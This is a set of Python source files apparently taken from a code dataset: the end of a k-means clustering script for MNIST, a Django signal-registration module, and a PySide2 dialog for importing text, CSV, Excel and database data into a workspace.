        Returns (tsne_MNIST_array, MNIST_df): the 2-D embedding used for
        clustering, and the raw DataFrame (used only for its row count).
        """
        MNIST_df = pd.read_csv("image_new_test_MNIST.txt", header=None)
        MNIST_array = np.array(MNIST_df)
        MNIST_array = MNIST_array.astype(float)
        #normalization of data using minmax scaler
        scaler = MinMaxScaler()
        scaled_MNIST_array = scaler.fit_transform(MNIST_array)
        #dimension reduction (PCA first to speed up t-SNE)
        pca = PCA(n_components= 30)
        pca_MNIST_array = pca.fit_transform(scaled_MNIST_array)
        #high dimension reduction using TSNE (random_state fixed for reproducibility)
        tsne = TSNE(n_components = 2, perplexity = 40, init = 'pca', random_state=0)
        tsne_MNIST_array = tsne.fit_transform(pca_MNIST_array)
        return tsne_MNIST_array, MNIST_df
    #Assignment step using manhattan (L1) distance
    def clustering_manhattan_distance(self, MNIST_array, centroids):
        """Return, for each row, the index of its nearest centroid (L1)."""
        distance_matrix = manhattan_distances(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmin(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids
    #Assignment step using cosine similarity
    def clustering_cosine_similarity(self, MNIST_array, centroids):
        """Return, for each row, the index of the most similar centroid.

        Note: argmax, not argmin - higher cosine similarity is better.
        """
        distance_matrix = cosine_similarity(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmax(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids
    #Assignment step using euclidean (L2) distance
    def clustering_euclidean_distance(self, MNIST_array, centroids):
        """Return, for each row, the index of its nearest centroid (L2)."""
        distance_matrix = euclidean_distances(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmin(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids
    #Update step: recompute centroids and per-cluster error
    def calculate_centroids(self, MNIST_array, nearest_centroid, centroids):
        """Recompute cluster means and accumulate per-cluster squared error.

        Returns (new_centroids, all_cluster_distances) where the latter has
        one summed error per cluster.
        NOTE(review): the error sums *squared manhattan* distances (d*d on
        L1 values); the commented-out line shows euclidean was swapped out,
        so "SSE" here is not the textbook euclidean SSE - confirm intent.
        """
        cluster_d = list()
        #all_cluster_distances = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]
        all_cluster_distances = np.zeros(len(centroids))
        new_centroids = list()
        new_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(nearest_centroid, columns=['Cluster'])], axis=1)
        new_df_arr = np.array(new_df['Cluster'])
        for c in set(new_df_arr):
            thiscluster = new_df[new_df['Cluster'] == c][new_df.columns[:-1]]
            temp = np.array(centroids[c])
            temp = temp.reshape(1,-1)
            #cluster_d = euclidean_distances(thiscluster, temp)
            cluster_d = manhattan_distances(thiscluster, temp)
            for d in cluster_d:
                all_cluster_distances[c] += d*d
            cluster_mean = thiscluster.mean(axis=0)
            new_centroids.append(cluster_mean)
        return new_centroids, all_cluster_distances
    #Plot SSE against the number of iterations
    def visualize_sse(self, iterations, SSE):
        """Line plot of SSE per iteration (blocks until the window closes)."""
        plt.figure()
        plt.plot(range(iterations), SSE, 'rx-')
        plt.xlabel('No.of iterations')
        plt.ylabel('SSE(Sum of squared errors)')
        plt.title('Elbow Method showing the optimal iterations')
        plt.show()
    #Elbow plot: best SSE for each candidate k
    def visualize_k_sse(self):
        """Run the full pipeline for k = 2,4,...,20 and plot best SSE vs k."""
        MNIST_array, MNIST_df = self.read_data()
        all_SSE = []
        all_k = []
        for k in range(2,21,2):
            #Randomly select k points as the initial centroids
            centroid_index = random.sample(range(0, len(MNIST_df)), k)
            centroids = list()
            for i in centroid_index:
                centroids.append(MNIST_array[i])
            #converting list into numpy array
            centroids = np.array(centroids)
            #List for sum of squared errors
            SSE = list()
            no_of_iterations = 50
            closest_centroid = list()
            for i in range(no_of_iterations):
                closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
                #closest_centroid = clustering_cosine_similarity(iris_array, centroids)
                centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
                SSE.append(sum(all_cluster_d))
            all_SSE.append(min(SSE))
            all_k.append(k)
        #Plot the values (note: SSE on the x-axis, k on the y-axis)
        plt.figure()
        plt.plot(all_SSE , all_k,'rx-')
        plt.xlabel('SSE')
        plt.ylabel('K-values')
        plt.title('The Elbow Method showing the optimal k - value')
        plt.show()
    #Function for k-means clustering
    def main_kmeans(self):
        """Fit k-means with self.k clusters and write labels to MNIST_results.csv.

        Labels are shifted from 0..9 to 1..10 before saving; an SSE-per-
        iteration plot is shown (blocking) before the file is written.
        """
        MNIST_array, MNIST_df = self.read_data()
        #number of clusters
        k = self.k
        #Randomly select k number of points as centroids
        centroid_index = random.sample(range(0, len(MNIST_df)), k)
        centroids = list()
        for i in centroid_index:
            centroids.append(MNIST_array[i])
        #converting list into numpy array
        centroids = np.array(centroids)
        #List for sum of squared errors
        SSE = list()
        no_of_iterations = 50
        closest_centroid = list()
        for i in range(no_of_iterations):
            #closest_centroid = self.clustering_euclidean_distance(MNIST_array, centroids)
            #closest_centroid = self.clustering_cosine_similarity(MNIST_array, centroids)
            closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
            centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
            SSE.append(sum(all_cluster_d))
        clustered_MNIST_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(closest_centroid, columns=['Cluster'])], axis=1)
        clustered_MNIST_df.replace({0:1,1:2,2:3,3:4,4:5,5:6,6:7,7:8,8:9,9:10}, inplace=True)
        #To visualize the number iterations on kmeans and SSE
        self.visualize_sse(no_of_iterations, SSE)
        #Saving the results into the file
        clustered_MNIST_df.to_csv('MNIST_results.csv',columns=['Cluster'], index =False, header = False)
#CLASS END=====================================================================================================================
#MAIN START=====================================================================================================================
# Execution start time
t_begin = time.time()
clusterer = kmeans(k = 10)
clusterer.main_kmeans()
# To visualize the different k values and SSE
# clusterer.visualize_k_sse()
print("Total execution time :", time.time() - t_begin, "seconds")
#MAIN END=====================================================================================================================
| hrishivib/k-means-iris-MNIST-classification | k-means_MNIST.py | k-means_MNIST.py | py | 7,624 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.MinMaxScaler",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklear... |
6793257031 | from django.apps import apps
from django.db.models.signals import post_save
from .invitation_status_changed import when_invitation_registration_post_save
from .consultant_validation_status_changed import when_consultant_validation_status_update
def setup_signals():
    """Connect post_save receivers to their models.

    Models are resolved lazily through the app registry so this can be
    called during app loading, before direct model imports are safe.
    """
    registrations = (
        ('invitation', 'Invitation',
         when_invitation_registration_post_save),
        ('consultant', 'ConsultantValidationStatus',
         when_consultant_validation_status_update),
    )
    for app_label, model_name, receiver in registrations:
        sender = apps.get_model(app_label=app_label, model_name=model_name)
        post_save.connect(receiver, sender=sender)
| tomasgarzon/exo-services | service-exo-core/registration/signals/__init__.py | __init__.py | py | 736 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.apps.apps.get_model",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.apps.apps",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.apps.apps.get_model",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "... |
17883995055 | # -*- encoding: utf-8 -*-
import logging
import os
import time
import numpy as np
import openpyxl
import pandas as pd
import xlrd
# 导入PyQt5模块
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from dataImportModel import Ui_Form as dataImportFormEngine
from widgets import kwargs_to_str
from lib.comm import set_var, run_command
# 导入matlab加载模块
# Module-level logger; DEBUG so all import-dialog diagnostics are captured.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class ImportDialog(QDialog):
    """Base dialog for importing external data into the workspace.

    Concrete subclasses (text/CSV/Excel/database forms) override
    ``getImportParam``, ``importDatasetReload`` and ``updateTableView``;
    this base class provides the shared preview / validation / send flow.
    """
    signal_data_change = Signal(str, dict, str, str, str, str, str)  # custom signal used to pass the file path
    extension_lib = None  # injected by the host app; provides workspace/variable services
    def __init__(self, parent=None):
        super(ImportDialog, self).__init__(parent)
        # Loaded data; in practice a dict of name -> DataFrame (annotation kept from original).
        self.current_dataset: pd.DataFrame = None
        # Aggregated validation state for the current import attempt.
        self.import_message = {"isError": False, "warningMessage": []}
        # Separator choices offered in the UI (regex-style tokens).
        self.separator_char = [",", ";", "\\s", "\\t"]
        # Encoding choices offered in the UI.
        self.encode_type = ["utf8", "gb2312", "gbk", "ascii"]
    def importDatasetPreview(self):
        """Hook: populate the preview; implemented by subclasses."""
        pass
    def getImportParam(self):
        """Hook: collect UI settings into self.import_param; implemented by subclasses."""
        pass
    def importDatasetReload(self):
        """Hook: (re)load data from its source; implemented by subclasses."""
        pass
    def updateTableView(self):
        """Hook: refresh the preview table; implemented by subclasses."""
        pass
    def open_file(self, path: str):
        """Programmatic entry point: open *path* directly and trigger a preview."""
        assert os.path.exists(path)
        self.lineEdit_filePath.setText(path)
        self.previewButton()
    def openfile(self):
        """
        Choose a file. Supported scenarios:
        (1) the "Browse" button was clicked
        (2) the "Preview" button was clicked
        """
        path = self.lineEdit_filePath.text()
        self.import_param.update(choosefile=False)
        if not path:
            # Only pop the file chooser when no path has been typed in yet.
            path, openfile_type = QFileDialog.getOpenFileName(self, '选择文件', self.get_work_dir(),
                                                              "文件类型({})".format(self.file_types))
            self.lineEdit_filePath.setText(path)
            if path:
                # If no file is chosen the dialog closes with an empty path and datasetName stays cleared.
                temp_name = (os.path.split(self.lineEdit_filePath.text())[1]).split(".")[0:-1]
                # Use the file name (sans extension) as the variable name; fall back to "temp" when empty.
                dataset_name = "temp" if temp_name == [""] else ".".join(temp_name)
                self.lineEdit_datasetName.setText(dataset_name)
        else:
            self.lineEdit_filePath.setText(self.import_param["filepath"])
    def chooseFileButton(self):
        """Handler for the "Browse" button: clear the path and re-run the preview."""
        self.lineEdit_filePath.setText("")
        self.previewButton()
    def previewButton(self):
        """Handler for the "Preview" button: collect params, load, and show the preview."""
        self.import_param.update(ispreview=True)
        self.openfile()
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
        else:
            if self.lineEdit_filePath.text():
                self.importDatasetLoad()
                self.updateTableView()
    def importDatasetButton(self):
        """Validate the data before sending it, then load and push it to the workspace."""
        self.import_param.update(ispreview=False)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        # if self.import_param["filepath"] == "" or len(self.current_dataset) == 0:
        if len(self.current_dataset) == 0:
            self.showWarningMessage(info="导入失败!\n提示:请提供正确数据集")
            return
        var_name_check = self.updateDatasetVarname()
        if var_name_check:
            import sys
            t0 = time.time()
            self.importDatasetLoad()
            self.sendDataset()
            t1 = time.time()
            # Log elapsed time and (shallow) size of the imported data.
            logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
                t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
            ))
            self.current_dataset = None
    def importDatasetLoad(self):
        """Fetch the data and validate it; returns the error string ('' on success)."""
        error = ""
        self.import_param.update(status=False)
        try:
            self.importDatasetReload()
            self.import_param.update(status=True)
        except UnicodeDecodeError as e:
            # Wrong encoding selected for the file.
            encodetype = self.import_param["param"]["encoding"]
            self.updateWarningMessage(info="指定的编码方式“{}”无法解码要打开的文件,请尝试其他编码方式".format(encodetype))
            error = str(e)
        except MemoryError as e:
            # File too large to fit in memory.
            self.updateWarningMessage(info="文件过大,超过内存上限,导入失败!")
            error = str(e)
        except Exception as e:
            self.updateWarningMessage(info="导入失败,错误详情:\n{}".format(str(e)))
            error = str(e)
        if self.import_message["isError"]:
            self.showWarningMessage()
        return (error)
    def getDatasetInfo(self, varname=""):
        """
        Collect variable names and data-structure info for the loaded data.
        Preserving a user's re-configured column dtypes is not supported yet.
        varname: if given, the unified name applied to every variable.
        """
        self.import_param.update(varname={}, dtypes={})
        for k in self.current_dataset:
            self.import_param["varname"][k] = varname if varname else k
            if type(self.current_dataset[k]) == pd.DataFrame:
                self.import_param["dtypes"][k] = self.current_dataset[k].dtypes
            else:
                self.import_param["dtypes"][k] = type(self.current_dataset[k])
    def updateDatasetVarname(self):
        """
        Prompt for (and validate) the variable name used at import time.
        TODO: dataset-name reset.
        Renaming at import may involve several scenarios in the future:
        (1) renaming after import
            [1] one file -> one variable (sheet)
            [2] one file -> many variables (sheets); may import as one dict,
                several variables, or merged into one variable if structures match
        (2) which data structure to import as: DataFrame, dict, str, list, ...
        (3) adjusting the data structure during import
        (4) collisions with existing variables: the user must resolve them
        This logic is therefore kept in its own method.
        """
        # Start from the current dataset/sheet name as the suggested variable name.
        self.newdatasetname = {"varname": {}}
        e = self.import_param["datasetname"]
        while True:
            var_name, ok = QInputDialog.getText(self, "变量名", "输入新的变量名称:", QLineEdit.Normal, e)
            if ok:
                if len(var_name) == 0:
                    QMessageBox.warning(self, "提示", "请输入变量名称!")
                    continue
                elif self.extension_lib.Data.var_exists(var_name):
                    # On a name collision, let the user decide whether to overwrite.
                    isCover = QMessageBox().question(None, "提示", "变量 {} 已经存在,是否覆盖?".format(var_name),
                                                     QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
                    if isCover == QMessageBox.Yes:
                        break
                    else:
                        continue
                elif not var_name.isidentifier():
                    QMessageBox.warning(self, '提示', '变量名无效\n提示:\n1、不要以数字开头;\n2、不要包含除下划线外的所有符号。')
                else:
                    break
            else:
                # User cancelled the dialog: keep preview state, report not-ok.
                ok = False
                self.import_param.update(ispreview=True, status=True)
                break
        if ok:
            self.newdatasetname["varname"][e] = var_name
            # if self.import_param["ismerge"]:
            #     self.newdatasetname["datasetname"] = var_name
            #     self.import_param["datasetname"] = var_name
            # else:
            #     self.newdatasetname["varname"][e] = var_name
            #     self.import_param["varname"][e] = var_name
        return (ok)
    def sendDataset(self):
        """
        This method is independent of whether the data came from SAS, SPSS or
        Excel: it simply adds the pandas data to the workspace.
        """
        if self.import_param["status"]:
            # if self.import_param["ismerge"]:
            #     set_var(self.newdatasetname["datasetname"], self.current_dataset)
            # else:
            for name_i, var_i in self.newdatasetname["varname"].items():
                set_var(var_i, self.current_dataset[name_i])  # push the data into the workspace
            QMessageBox.information(self, "{}导入结果".format(""), "数据导入完成!", QMessageBox.Yes)
            self.close()
    def clearImportParam(self):
        """Reset the dataset and every import parameter to its default."""
        self.current_dataset = {}
        self.import_message = {"isError": False, "warningMessage": []}
        self.import_param = {
            "datasetname": "",  # dataset name
            "varname": {},  # imported variable names (dict); later holds renamed results
            "filepath": "",  # file path
            "hasheader": True,  # whether the first row is the header
            "dtypes": {},  # column dtypes (dict); later holds re-configured dtypes
            "status": False,  # import status: True = success, False = failure
            "param": {},  # parameters gathered from the import panel (dict)
            "ispreview": True,  # preview-mode flag
            "ismerge": False  # whether a multi-variable dataset is merged into one dict on import
        }
    def get_work_dir(self) -> str:
        """Return the application's working directory."""
        return self.extension_lib.Program.get_work_dir()
    def center(self):
        """Center the window on the available screen geometry."""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
    def keyPressEvent(self, e):
        """Escape closes the window after a confirmation prompt."""
        if e.key() == Qt.Key_Escape:
            button = QMessageBox.question(self, "Question", "是否退出当前窗口?",
                                          QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
            if button == QMessageBox.Ok:
                self.close()
    def showWarningMessage(self, info=""):
        """Show *info*, or the first pending warning message when *info* is empty."""
        info = info if info else self.import_message["warningMessage"][0]
        if info:
            QMessageBox.warning(self, '警告:', info)
            logging.info("获取数据警告:\n" + info)
    def updateWarningMessage(self, info="", new=True):
        """Record a warning (new=True) or reset the warning state (new=False)."""
        if new:
            self.import_message["isError"] = True
            self.import_message["warningMessage"].append(info)
        else:
            self.import_message["isError"] = False
            self.import_message["warningMessage"] = []
    def checkFilePath(self, path):
        """Validate the entered file path (existence and extension); returns it unchanged."""
        if path:
            if not os.path.exists(path):
                self.updateWarningMessage(info="数据集路径不存在,\n请重新输入数据集路径!")
            # NOTE(review): extension check is a substring test against a
            # pattern string like "*.csv *.txt" - works, but loosely.
            if os.path.split(path)[-1].split(".")[-1].lower() not in self.file_types:
                self.updateWarningMessage(
                    info="数据文件格式有错:\n仅支持({})类型文件,\n请重新输入数据集路径!".format(self.file_types)
                )
        return (path)
    def checkRowsNumber(self, rows, types):
        """Validate a row-count field: a non-negative integer, or "全部" (all) for the limit."""
        typesDict = {
            "limitRows": "“限定行数”必须是大于等于0的整数或“全部”",
            "skipRows": "“跳过行数”必须是大于等于0的整数"
        }
        if rows == "全部":
            row_number = None
        elif rows.isdigit():
            row_number = int(rows)
        else:
            row_number = 0
            self.updateWarningMessage(info="{}\n请重新输入!".format(typesDict[types]))
        if self.import_param["ispreview"] and types == "limitRows":
            # In preview mode, cap the row limit at 100 rows.
            row_number = min([100, row_number if row_number else 101])
        return (row_number)
    def headerAsColumns(self, data):
        """Demote the header row back into the data and rename columns to C1..Cn."""
        colnames = pd.DataFrame([data.columns], index=[0], columns=data.columns.tolist())
        data.index += 1
        # NOTE(review): DataFrame.append is removed in pandas 2.x -
        # presumably fine on the pinned pandas version; verify.
        data = data.append(colnames, ignore_index=False)
        data.sort_index(inplace=True)
        data.columns = ["C" + str(i + 1) for i in range(data.shape[1])]
        return (data)
    def datasetUpdate(self, data, skiprow, limitrow):
        """Apply the skip-rows / limit-rows constraints to *data* in memory."""
        data = data[data.index >= skiprow]  # skip rows
        if limitrow:
            limitrows = min(data.shape[0], limitrow)
            data = data.head(limitrows)
        return (data)
    def showDatasetPreview(self, data, header=True):
        """Render up to 100 rows of *data* into the preview table widget."""
        if not header:
            # First row is data, not a header: demote it.
            data = self.headerAsColumns(data)
        table_rows, table_colunms = data.head(100).shape
        table_header = [str(col_i) for col_i in data.columns.tolist()]
        self.tableWidget_previewData.setColumnCount(table_colunms)
        self.tableWidget_previewData.setRowCount(table_rows)
        self.tableWidget_previewData.setHorizontalHeaderLabels(table_header)
        # Fill the preview grid cell by cell.
        for i in range(table_rows):
            row_values = data.iloc[i].tolist()
            for j, element in enumerate(row_values):
                newItem = QTableWidgetItem(str(element))
                newItem.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
                self.tableWidget_previewData.setItem(i, j, newItem)
    def updateDatasetNameLine(self, tag):
        """Update the dataset-name field; "(全部导入)" keeps the current dataset name."""
        new_datasetname = self.import_param["datasetname"] if tag == "(全部导入)" else tag
        self.lineEdit_datasetName.setText(new_datasetname)
    def clearPreviewDataTableWidget(self):
        """Clear the preview table widget."""
        self.tableWidget_previewData.clear()
        self.showDatasetPreview(data=pd.DataFrame([]))
    def showHelp(self):
        """Open the sample-data help page via the help-link extension."""
        from packages.pm_helpLinkEngine import helpLinkEngine as h
        h.helpLink.openHelp("dataio_sample_showhelp")
    # Database-related methods
    def checkTextNotNull(self, dicts):
        """Verify that none of the given connection fields are empty."""
        db_dict = {"host": "IP地址", "user": "用户名称", "passwd": "密码", "db": "数据库名称", "password": "密码",
                   "port": "IP端口", "charset": "数据类型", "table": "表格名称", "schema": "数据模式", "database": "数据库名称",
                   "server_name": "服务名称"}
        for k, v in dicts.items():
            if not v:
                self.updateWarningMessage(info="‘{tag}’不能为空,请重新输入!".format(tag=db_dict[k]))
    def updateDatabaseConnectStatusLabel(self, e=""):
        """Show the connection status label: success in blue, or the error *e* in red."""
        tag = {"label": "连接成功", "color": "color: blue;"}
        if e:
            tag.update(label='连接失败:' + e, color="color: rgb(255, 0, 0);")
        self.label_test.setHidden(False)
        self.label_test.setText(tag["label"])
        self.label_test.setStyleSheet(tag["color"])
    def dbConnectTestButton(self):
        """Test whether the database connection parameters are valid."""
        self.import_param.update(ispreview=True)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        error = self.importDatasetLoad()
        self.updateDatabaseConnectStatusLabel(error)
    def dbDatasetImportButton(self):
        """Handler for the database "Import" button: load and send to the workspace."""
        self.import_param.update(ispreview=False)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        var_name_check = self.updateDatasetVarname()
        if var_name_check:
            import sys
            t0 = time.time()
            error = self.importDatasetLoad()
            self.updateDatabaseConnectStatusLabel(error)
            self.sendDataset()
            t1 = time.time()
            logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
                t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
            ))
            self.current_dataset = None
    def getCurFetchData(self, cur):
        """Execute the configured SQL on cursor *cur* and return the result as a DataFrame."""
        temp = pd.DataFrame([])
        try:
            cur.execute(self.import_param["sql"])
            if cur.description:
                temp = pd.DataFrame(data=list(cur.fetchall()),
                                    columns=list(map(lambda x: x[0], cur.description)))
        except Exception as e:
            # NOTE(review): "{}" is concatenated, not formatted - the message
            # will contain a literal "{}" before the error text.
            self.updateWarningMessage("导入失败,错误详情:\n{}" + str(e))
        return (temp)
    def updateChooseTagName(self, comboBox, tagname=[]):
        """Load the imported file's variable names into *comboBox*.

        NOTE(review): mutable default argument; harmless here since tagname
        is only rebound, never mutated in place.
        """
        comboBox.clear()
        if not self.import_param["status"]:
            return
        if not tagname:
            tagname = list(self.current_dataset)
        # With more than one variable, offer an "import everything" entry first.
        tagname = ["(全部导入)"] + tagname if len(tagname) > 1 else tagname
        for v in tagname:
            # Refresh the "data location" list in the import panel.
            comboBox.addItem(v)
# Optimization complete
class ImportTextForm(ImportDialog, dataImportFormEngine):
    """
    "Import Text" dialog. Key methods:
    (1) getImportParam: collect the configuration from the panel
    (2) importDatasetReload: (re)load the file contents
    (3) updateTableView: refresh the preview view
    """
    def __init__(self, parent=None):
        self.file_types = "*.csv *.txt *.tsv"
        self.IconPath = ":/resources/icons/txt.svg"
        super().__init__(parent)
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the form-specific widget signals."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header toggle
        self.checkBox_asString.stateChanged.connect(self.previewButton)  # import as raw text toggle
        self.comboBox_encode.currentTextChanged.connect(self.previewButton)  # encoding choice
        self.comboBox_separator.currentTextChanged.connect(self.previewButton)  # separator choice
    def updateUIForm(self):
        """Lay out the ImportTextForm configuration widgets."""
        separator_char = ["\\n"] + self.separator_char
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, separator_char)
        self.horizontalLayoutAddUI(self.checkBox_asString)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
        self.verticalLayoutAddUI(self.comboBox_separator, "right")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the panel configuration:
        (1) header row (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            asString=self.checkBox_asString.isChecked(),
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "engine": "python",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "sep": self.comboBox_separator.currentText(),
                "encoding": self.comboBox_encode.currentText(),
                "nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
                "skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
            }
        )
    def importDatasetReload(self):
        """
        Reload the data being imported.
        In raw-text mode the file is read as one string; otherwise via pd.read_table.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        if self.import_param["asString"]:
            # In text mode "nrows" is reused as a character count (-1 = read all).
            with open(file=param["filepath_or_buffer"], encoding=param["encoding"]) as f:
                size = param["nrows"] if param["nrows"] else -1
                temp = f.read(size)
                f.close()  # NOTE(review): redundant inside the with-block
        else:
            temp = pd.read_table(**param)
        # A text import handles one file at a time, so the variable name
        # defaults to the dataset name.
        self.current_dataset[varname] = temp
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """Refresh the preview table from the loaded data."""
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        dataset = self.current_dataset[self.import_param["datasetname"]]
        if self.checkBox_asString.isChecked():
            # Raw-text mode: show the first 100 characters in a single cell.
            preview_data = pd.DataFrame({"文本": [dataset[:100]]})
            header = True
        else:
            preview_data = dataset.head(100)
            header = self.checkBox_ifColumns.isChecked()
        self.showDatasetPreview(data=preview_data, header=header)
# Optimization complete
class ImportCsvForm(ImportDialog, dataImportFormEngine):
    """CSV import dialog (pd.read_csv with the C engine)."""
    def __init__(self, parent=None):
        self.IconPath = ":/resources/icons/csv.svg"
        self.file_types = "*.csv"
        super().__init__(parent)
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        self.updateUIForm()
    def AddUIFormActivity(self):
        """Wire up the form-specific widget signals."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header toggle
        self.checkBox_ifColIndex.stateChanged.connect(self.previewButton)  # first column is index toggle
        self.comboBox_encode.currentTextChanged.connect(self.previewButton)  # encoding choice
        self.comboBox_separator.currentTextChanged.connect(self.previewButton)  # separator choice
    def updateUIForm(self):
        """Lay out the ImportCsvForm configuration widgets."""
        self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, self.separator_char)
        self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
        self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
        self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
        self.verticalLayoutAddUI(self.comboBox_separator, "right")
        self.verticalLayoutAddUI(self.comboBox_encode, "right")
        self.publicUIFormActivity()
        self.AddUIFormActivity()
    def getImportParam(self):
        """
        Collect the panel configuration:
        (1) header row (2) dataset name (3) rows to skip (4) row limit
        (5) file encoding (6) separator
        """
        self.updateWarningMessage(new=False)
        self.import_param.update(
            datasetname=self.lineEdit_datasetName.text(),
            filepath=self.lineEdit_filePath.text(),
            hasheader=self.checkBox_ifColumns.isChecked(),
            status=False, varname={}, dtypes={},
            param={
                "filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
                "engine": "c",
                "header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
                "sep": self.comboBox_separator.currentText(),
                "index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
                "encoding": self.comboBox_encode.currentText(),
                "nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
                "skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
            }
        )
    def importDatasetReload(self):
        """
        Reload the data being imported via pd.read_csv, and echo the
        equivalent command into the host's command log.
        """
        param = self.import_param["param"]
        self.current_dataset = {}
        varname = self.import_param["datasetname"]
        # CSV handles one file at a time, so the variable name defaults to
        # the dataset name.
        self.current_dataset[varname] = pd.read_csv(**param)
        run_command("", "pd.read_csv(%s)" % kwargs_to_str(param))
        self.getDatasetInfo()
        self.import_param.update(status=True)
    def updateTableView(self):
        """Refresh the preview table from the loaded data."""
        # Prepare the content to display.
        self.clearPreviewDataTableWidget()
        if not self.import_param["status"]:
            return
        dataset = self.current_dataset[self.import_param["datasetname"]]
        # NOTE(review): "(无)" is not in separator_char for this form, so
        # this branch looks unreachable here - possibly copied from the
        # text form; verify.
        if self.comboBox_separator.currentText() == "(无)":
            preview_data = pd.DataFrame({"文本": [dataset[:100]]})
            header = True
        else:
            preview_data = dataset.head(100)
            header = self.checkBox_ifColumns.isChecked()
        self.showDatasetPreview(data=preview_data, header=header)
# 后续还需要进一步优化方案
class ImportExcelForm(ImportDialog, dataImportFormEngine):
    """Dialog for importing datasets from Excel workbooks (*.xls / *.xlsx)."""

    def __init__(self, parent=None):
        super().__init__(parent)
        self.IconPath = ":/resources/icons/excel.svg"
        self.setupUi(self)
        self.center()
        self.clearImportParam()
        # Path of the workbook loaded last time; used to skip re-reading
        # the file when only display options changed.
        self.new_import_filepath = ""
        self.file_types = "*.xls *.xlsx"
        self.sheetsname = []
        self.updateUIForm()

    def AddUIFormActivity(self):
        """Wire up the widget signals specific to this dialog."""
        self.checkBox_ifColumns.stateChanged.connect(self.updateTableView)  # first row is header
        self.checkBox_ifColIndex.stateChanged.connect(self.previewButton)  # first column is index
        self.comboBox_sheetname.currentTextChanged.connect(self.updateTableView)  # sheet switched

    def updateUIForm(self):
        """Lay out the configuration widgets of the import form."""
        self.horizontalLayoutAddUI(self.checkBox_ifColumns)  # first row as column names
        self.horizontalLayoutAddUI(self.checkBox_ifColIndex)  # first column as row index
        self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")  # dataset name
        self.verticalLayoutAddUI(self.comboBox_sheetname, "right")  # sheet name
